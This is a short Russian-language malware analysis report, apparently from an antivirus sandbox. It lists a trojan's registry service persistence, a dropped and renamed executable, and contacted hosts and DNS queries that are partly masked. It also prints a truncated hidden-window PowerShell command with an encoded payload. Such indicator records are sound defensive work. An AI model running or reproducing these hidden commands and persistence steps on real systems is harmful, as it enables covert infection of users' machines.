Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\sidebarexce] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\sidebarexce] 'ImagePath' = '"%WINDIR%\SysWOW64\sidebarexce.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABIAGkAYwByAHoAdABmAGIAcQBpAHgAPQAnAEsAcwB1AG0AZAB0AHgAawB1ACcAOwAkAEwAcABvAHoAdwB2AGoAdQAgAD0AIAAnADYAMQAzACcAOwAkAEcAegBpAG0AZQBnAGIAbwBtAD0AJwBaAHIAbABhAHkAbAB5AHUAZgB0AGoAZAB...
- %HOMEPATH%\613.exe
- %HOMEPATH%\613.exe в %WINDIR%\syswow64\sidebarexce.exe
- http://sc#####rofessional.info/plugins/266-wcvu9ml-67633827/
- http://99.##9.254.209/wCQpKXWrNtZoIdB
- DNS ASK do####qiuqiu.vip
- DNS ASK sc#####rofessional.info
- '%HOMEPATH%\613.exe'
- '%WINDIR%\syswow64\sidebarexce.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABIAGkAYwByAHoAdABmAGIAcQBpAHgAPQAnAEsAcwB1AG0AZAB0AHgAawB1ACcAOwAkAEwAcABvAHoAdwB2AGoAdQAgAD0AIAAnADYAMQAzACcAOwAkAEcAegBpAG0AZQBnAGIAbwBtAD0AJwBaAHIAbABhAHkAbAB5AHUAZgB0AGoAZAB...' (со скрытым окном)